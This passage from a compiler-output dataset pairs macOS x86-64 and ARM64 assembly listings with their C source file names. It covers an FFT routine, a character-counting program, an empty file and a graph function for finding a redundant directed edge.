.p2align 3 ## -- Begin function four1
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
LCPI0_1:
.quad 0xc000000000000000 ## double -2
LCPI0_2:
.quad 0x3fe0000000000000 ## double 0.5
LCPI0_3:
.quad 0x401921fb54442d1c ## double 6.2831853071795898
.section __TEXT,__text,regular,pure_instructions
.globl _four1
.p2align 4, 0x90
_four1: ## @four1
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
movl -12(%rbp), %eax
shll $1, %eax
movl %eax, -20(%rbp)
movl $1, -32(%rbp)
movl $1, -40(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_5 Depth 2
movl -40(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_11
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -32(%rbp), %eax
cmpl -40(%rbp), %eax
jle LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -92(%rbp)
movq -8(%rbp), %rax
movslq -40(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movslq -40(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -92(%rbp)
movq -8(%rbp), %rax
movl -40(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss %xmm0, (%rax,%rcx,4)
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movl -40(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss %xmm0, (%rax,%rcx,4)
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
sarl $1, %eax
movl %eax, -28(%rbp)
LBB0_5: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $2, -28(%rbp)
movb %al, -97(%rbp) ## 1-byte Spill
jl LBB0_7
## %bb.6: ## in Loop: Header=BB0_5 Depth=2
movl -32(%rbp), %eax
cmpl -28(%rbp), %eax
setg %al
movb %al, -97(%rbp) ## 1-byte Spill
LBB0_7: ## in Loop: Header=BB0_5 Depth=2
movb -97(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_8
jmp LBB0_9
LBB0_8: ## in Loop: Header=BB0_5 Depth=2
movl -28(%rbp), %ecx
movl -32(%rbp), %eax
subl %ecx, %eax
movl %eax, -32(%rbp)
movl -28(%rbp), %eax
sarl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_5
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
movl -28(%rbp), %eax
addl -32(%rbp), %eax
movl %eax, -32(%rbp)
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
movl -40(%rbp), %eax
addl $2, %eax
movl %eax, -40(%rbp)
jmp LBB0_1
LBB0_11:
movl $2, -24(%rbp)
LBB0_12: ## =>This Loop Header: Depth=1
## Child Loop BB0_14 Depth 2
## Child Loop BB0_16 Depth 3
movl -20(%rbp), %eax
cmpl -24(%rbp), %eax
jle LBB0_22
## %bb.13: ## in Loop: Header=BB0_12 Depth=1
movl -24(%rbp), %eax
shll $1, %eax
movl %eax, -36(%rbp)
movl -16(%rbp), %eax
imull -24(%rbp), %eax
cvtsi2sd %eax, %xmm1
movsd LCPI0_3(%rip), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -88(%rbp)
movsd LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero
mulsd -88(%rbp), %xmm0
callq _sin
movsd %xmm0, -48(%rbp)
movsd LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero
mulsd -48(%rbp), %xmm0
mulsd -48(%rbp), %xmm0
movsd %xmm0, -64(%rbp)
movsd -88(%rbp), %xmm0 ## xmm0 = mem[0],zero
callq _sin
movsd %xmm0, -72(%rbp)
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -56(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -80(%rbp)
movl $1, -28(%rbp)
LBB0_14: ## Parent Loop BB0_12 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_16 Depth 3
movl -28(%rbp), %eax
cmpl -24(%rbp), %eax
jge LBB0_21
## %bb.15: ## in Loop: Header=BB0_14 Depth=2
movl -28(%rbp), %eax
movl %eax, -40(%rbp)
LBB0_16: ## Parent Loop BB0_12 Depth=1
## Parent Loop BB0_14 Depth=2
## => This Inner Loop Header: Depth=3
movl -40(%rbp), %eax
cmpl -20(%rbp), %eax
jg LBB0_19
## %bb.17: ## in Loop: Header=BB0_16 Depth=3
movl -40(%rbp), %eax
addl -24(%rbp), %eax
movl %eax, -32(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movss (%rax,%rcx,4), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm2
movsd -80(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss (%rax,%rcx,4), %xmm3 ## xmm3 = mem[0],zero,zero,zero
cvtss2sd %xmm3, %xmm3
mulsd %xmm3, %xmm1
movq %xmm1, %rax
movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000
xorq %rcx, %rax
movq %rax, %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -92(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss (%rax,%rcx,4), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm2
movsd -80(%rbp), %xmm1 ## xmm1 = mem[0],zero
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movss (%rax,%rcx,4), %xmm3 ## xmm3 = mem[0],zero,zero,zero
cvtss2sd %xmm3, %xmm3
mulsd %xmm3, %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -96(%rbp)
movq -8(%rbp), %rax
movslq -40(%rbp), %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -92(%rbp), %xmm0
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movss %xmm0, (%rax,%rcx,4)
movq -8(%rbp), %rax
movl -40(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss (%rax,%rcx,4), %xmm0 ## xmm0 = mem[0],zero,zero,zero
subss -96(%rbp), %xmm0
movq -8(%rbp), %rax
movl -32(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movss %xmm0, (%rax,%rcx,4)
movss -92(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movslq -40(%rbp), %rcx
addss (%rax,%rcx,4), %xmm0
movss %xmm0, (%rax,%rcx,4)
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movq -8(%rbp), %rax
movl -40(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
addss (%rax,%rcx,4), %xmm0
movss %xmm0, (%rax,%rcx,4)
## %bb.18: ## in Loop: Header=BB0_16 Depth=3
movl -36(%rbp), %eax
addl -40(%rbp), %eax
movl %eax, -40(%rbp)
jmp LBB0_16
LBB0_19: ## in Loop: Header=BB0_14 Depth=2
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -48(%rbp)
movsd -64(%rbp), %xmm2 ## xmm2 = mem[0],zero
movsd -80(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd -72(%rbp), %xmm1
movq %xmm1, %rax
movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000
xorq %rcx, %rax
movq %rax, %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
addsd -56(%rbp), %xmm0
movsd %xmm0, -56(%rbp)
movsd -80(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd -64(%rbp), %xmm2 ## xmm2 = mem[0],zero
movsd -48(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd -72(%rbp), %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
addsd -80(%rbp), %xmm0
movsd %xmm0, -80(%rbp)
## %bb.20: ## in Loop: Header=BB0_14 Depth=2
movl -28(%rbp), %eax
addl $2, %eax
movl %eax, -28(%rbp)
jmp LBB0_14
LBB0_21: ## in Loop: Header=BB0_12 Depth=1
movl -36(%rbp), %eax
movl %eax, -24(%rbp)
jmp LBB0_12
LBB0_22:
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/99278.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
mov w1, #0
str wzr, [sp, #44]
add x0, sp, #48
mov x2, #40
bl _memset
str wzr, [sp, #28]
str wzr, [sp, #32]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
bl _getchar
str w0, [sp, #40]
adds w8, w0, #1
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #40]
str w8, [sp, #24] ; 4-byte Folded Spill
subs w8, w8, #9
subs w8, w8, #1
cset w8, ls
tbnz w8, #0, LBB0_6
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #24] ; 4-byte Folded Reload
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #24] ; 4-byte Folded Reload
subs w8, w8, #48
subs w8, w8, #9
cset w8, hi
tbnz w8, #0, LBB0_7
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #40]
subs w9, w8, #48
add x8, sp, #48
add x9, x8, w9, sxtw #2
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
b LBB0_8
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_8
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_9:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
str wzr, [sp, #36]
b LBB0_10
LBB0_10: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #36]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_13
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_10 Depth=1
ldrsw x9, [sp, #36]
add x8, sp, #48
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_10 Depth=1
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB0_10
LBB0_13:
ldr w8, [sp, #32]
; implicit-def: $x10
mov x10, x8
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14:
bl ___stack_chk_fail
LBB0_15:
mov w0, #0
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "digits ="
l_.str.1: ; @.str.1
.asciz " %d"
l_.str.2: ; @.str.2
.asciz ", white space = %d, other = %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
leaq -48(%rbp), %rdi
xorl %esi, %esi
movl $40, %edx
callq _memset
movl $0, -68(%rbp)
movl $0, -64(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
callq _getchar
movl %eax, -56(%rbp)
cmpl $-1, %eax
je LBB0_7
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -56(%rbp), %eax
movl %eax, -72(%rbp) ## 4-byte Spill
addl $-9, %eax
subl $2, %eax
jb LBB0_4
jmp LBB0_14
LBB0_14: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %eax ## 4-byte Reload
subl $32, %eax
je LBB0_4
jmp LBB0_15
LBB0_15: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %eax ## 4-byte Reload
addl $-48, %eax
subl $9, %eax
ja LBB0_5
jmp LBB0_3
LBB0_3: ## in Loop: Header=BB0_1 Depth=1
movl -56(%rbp), %eax
subl $48, %eax
cltq
movl -48(%rbp,%rax,4), %ecx
addl $1, %ecx
movl %ecx, -48(%rbp,%rax,4)
jmp LBB0_6
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
jmp LBB0_6
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movl -68(%rbp), %eax
addl $1, %eax
movl %eax, -68(%rbp)
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_7:
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -60(%rbp)
LBB0_8: ## =>This Inner Loop Header: Depth=1
cmpl $10, -60(%rbp)
jge LBB0_11
## %bb.9: ## in Loop: Header=BB0_8 Depth=1
movslq -60(%rbp), %rax
movl -48(%rbp,%rax,4), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
## %bb.10: ## in Loop: Header=BB0_8 Depth=1
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB0_8
LBB0_11:
movl -64(%rbp), %esi
movl -68(%rbp), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_13
## %bb.12:
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
LBB0_13:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "digits ="
L_.str.1: ## @.str.1
.asciz " %d"
L_.str.2: ## @.str.2
.asciz ", white space = %d, other = %d\n"
.subsections_via_symbols
| the_stack_data/63085.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/198580981.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _findRedundantDirectedConnection ; -- Begin function findRedundantDirectedConnection
.p2align 2
_findRedundantDirectedConnection: ; @findRedundantDirectedConnection
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #208
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur x0, [x29, #-24]
stur w1, [x29, #-28]
stur x2, [x29, #-40]
stur x3, [x29, #-48]
ldur w8, [x29, #-28]
add w8, w8, #1
; kill: def $x8 killed $w8
mov x9, sp
stur x9, [x29, #-56]
lsl x9, x8, #3
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-192] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-192] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-184] ; 8-byte Folded Spill
stur x8, [x29, #-64]
ldur w8, [x29, #-28]
add w8, w8, #1
; kill: def $x8 killed $w8
stur x8, [x29, #-160] ; 8-byte Folded Spill
lsl x9, x8, #2
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-176] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-176] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-152] ; 8-byte Folded Spill
stur x8, [x29, #-72]
ldur w8, [x29, #-28]
add w8, w8, #1
; kill: def $x8 killed $w8
stur x8, [x29, #-144] ; 8-byte Folded Spill
lsl x9, x8, #2
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-168] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-168] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-112] ; 8-byte Folded Spill
stur x8, [x29, #-80]
ldur x9, [x29, #-48]
mov w8, #2
str w8, [x9]
ldur x8, [x29, #-48]
ldrsw x9, [x8]
mov x8, #4
stur x8, [x29, #-136] ; 8-byte Folded Spill
mul x0, x8, x9
bl _malloc
ldur x9, [x29, #-160] ; 8-byte Folded Reload
ldur x8, [x29, #-136] ; 8-byte Folded Reload
mov x10, x0
ldur x0, [x29, #-152] ; 8-byte Folded Reload
stur x10, [x29, #-88]
mul x2, x8, x9
mov w1, #0
stur w1, [x29, #-124] ; 4-byte Folded Spill
mov x3, #-1
stur x3, [x29, #-120] ; 8-byte Folded Spill
bl ___memset_chk
ldur x9, [x29, #-144] ; 8-byte Folded Reload
ldur x8, [x29, #-136] ; 8-byte Folded Reload
ldur w1, [x29, #-124] ; 4-byte Folded Reload
ldur x3, [x29, #-120] ; 8-byte Folded Reload
ldur x0, [x29, #-112] ; 8-byte Folded Reload
mul x2, x8, x9
bl ___memset_chk
mov w8, #-1
stur w8, [x29, #-92]
stur wzr, [x29, #-96]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-96]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_9
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldur x9, [x29, #-24]
ldursw x10, [x29, #-96]
ldr x9, [x9, x10, lsl #3]
ldrsw x9, [x9]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldur x9, [x29, #-24]
ldursw x10, [x29, #-96]
ldr x9, [x9, x10, lsl #3]
ldrsw x9, [x9, #4]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur x0, [x29, #-88]
ldur x8, [x29, #-24]
ldursw x9, [x29, #-96]
ldr x1, [x8, x9, lsl #3]
mov x2, #8
mov x3, #-1
bl ___memcpy_chk
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-152] ; 8-byte Folded Reload
ldur x10, [x29, #-184] ; 8-byte Folded Reload
ldur x11, [x29, #-112] ; 8-byte Folded Reload
ldur x9, [x29, #-24]
ldursw x12, [x29, #-96]
ldr x9, [x9, x12, lsl #3]
ldrsw x12, [x9, #4]
mov w9, #1
str w9, [x11, x12, lsl #2]
ldur x12, [x29, #-24]
ldursw x13, [x29, #-96]
ldr x12, [x12, x13, lsl #3]
ldrsw x12, [x12]
str w9, [x11, x12, lsl #2]
ldur x9, [x29, #-24]
ldursw x11, [x29, #-96]
ldr x9, [x9, x11, lsl #3]
ldr w9, [x9]
ldur x11, [x29, #-24]
ldursw x12, [x29, #-96]
ldr x11, [x11, x12, lsl #3]
ldrsw x11, [x11, #4]
add x10, x10, x11, lsl #3
ldur x11, [x29, #-24]
ldursw x12, [x29, #-96]
ldr x11, [x11, x12, lsl #3]
ldrsw x12, [x11, #4]
mov x11, x8
add x13, x11, x12, lsl #2
ldrsw x11, [x13]
mov x12, x11
add w12, w12, #1
str w12, [x13]
str w9, [x10, x11, lsl #2]
ldur x9, [x29, #-24]
ldursw x10, [x29, #-96]
ldr x9, [x9, x10, lsl #3]
ldrsw x9, [x9, #4]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, le
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-24]
ldursw x9, [x29, #-96]
ldr x8, [x8, x9, lsl #3]
ldr w8, [x8, #4]
stur w8, [x29, #-92]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-96]
add w8, w8, #1
stur w8, [x29, #-96]
b LBB0_1
LBB0_9:
ldur w8, [x29, #-92]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
ldur x8, [x29, #-88]
stur x8, [x29, #-16]
mov w8, #1
stur w8, [x29, #-100]
b LBB0_20
LBB0_11:
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldursw x9, [x29, #-92]
lsl x9, x9, #3
ldr w8, [x8, x9]
stur w8, [x29, #-104]
b LBB0_12
LBB0_12: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-152] ; 8-byte Folded Reload
ldursw x9, [x29, #-104]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #0
cset w8, eq
mov w9, #0
stur w9, [x29, #-196] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_12 Depth=1
ldur w8, [x29, #-104]
ldur w9, [x29, #-92]
subs w8, w8, w9
cset w8, ne
stur w8, [x29, #-196] ; 4-byte Folded Spill
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_12 Depth=1
ldur w8, [x29, #-196] ; 4-byte Folded Reload
tbz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_12 Depth=1
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldursw x9, [x29, #-104]
lsl x9, x9, #3
ldr w8, [x8, x9]
stur w8, [x29, #-104]
b LBB0_12
LBB0_16:
ldur w8, [x29, #-104]
ldur w9, [x29, #-92]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17:
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldursw x9, [x29, #-92]
lsl x9, x9, #3
ldr w8, [x8, x9]
ldur x9, [x29, #-88]
str w8, [x9]
ldur w8, [x29, #-92]
ldur x9, [x29, #-88]
str w8, [x9, #4]
b LBB0_19
LBB0_18:
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldursw x9, [x29, #-92]
add x8, x8, x9, lsl #3
ldr w8, [x8, #4]
ldur x9, [x29, #-88]
str w8, [x9]
ldur w8, [x29, #-92]
ldur x9, [x29, #-88]
str w8, [x9, #4]
b LBB0_19
LBB0_19:
ldur x8, [x29, #-88]
stur x8, [x29, #-16]
mov w8, #1
stur w8, [x29, #-100]
b LBB0_20
LBB0_20:
ldur x8, [x29, #-56]
mov sp, x8
ldur x8, [x29, #-16]
stur x8, [x29, #-208] ; 8-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_22
b LBB0_21
LBB0_21:
bl ___stack_chk_fail
LBB0_22:
ldur x0, [x29, #-208] ; 8-byte Folded Reload
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _findRedundantDirectedConnection ## -- Begin function findRedundantDirectedConnection
.p2align 4, 0x90
_findRedundantDirectedConnection: ## @findRedundantDirectedConnection
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $176, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -24(%rbp)
movl %esi, -28(%rbp)
movq %rdx, -40(%rbp)
movq %rcx, -48(%rbp)
movl -28(%rbp), %eax
incl %eax
## kill: def $rax killed $eax
movq %rax, -152(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -56(%rbp)
shlq $3, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -152(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -144(%rbp) ## 8-byte Spill
movq %rax, -64(%rbp)
movl -28(%rbp), %eax
incl %eax
## kill: def $rax killed $eax
movq %rax, -136(%rbp) ## 8-byte Spill
shlq $2, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -136(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -128(%rbp) ## 8-byte Spill
movq %rax, -72(%rbp)
movl -28(%rbp), %eax
incl %eax
## kill: def $rax killed $eax
movq %rax, -120(%rbp) ## 8-byte Spill
shlq $2, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -120(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -112(%rbp) ## 8-byte Spill
movq %rax, -80(%rbp)
movq -48(%rbp), %rax
movl $2, (%rax)
movq -48(%rbp), %rax
movslq (%rax), %rdi
shlq $2, %rdi
callq _malloc
movq -136(%rbp), %rdx ## 8-byte Reload
movq -128(%rbp), %rdi ## 8-byte Reload
movq %rax, -88(%rbp)
shlq $2, %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
movq -120(%rbp), %rdx ## 8-byte Reload
movq -112(%rbp), %rdi ## 8-byte Reload
shlq $2, %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
movl $-1, -92(%rbp)
movl $0, -96(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -96(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB0_9
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -112(%rbp), %rax ## 8-byte Reload
movq -24(%rbp), %rcx
movslq -96(%rbp), %rdx
movq (%rcx,%rdx,8), %rcx
movslq (%rcx), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB0_5
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
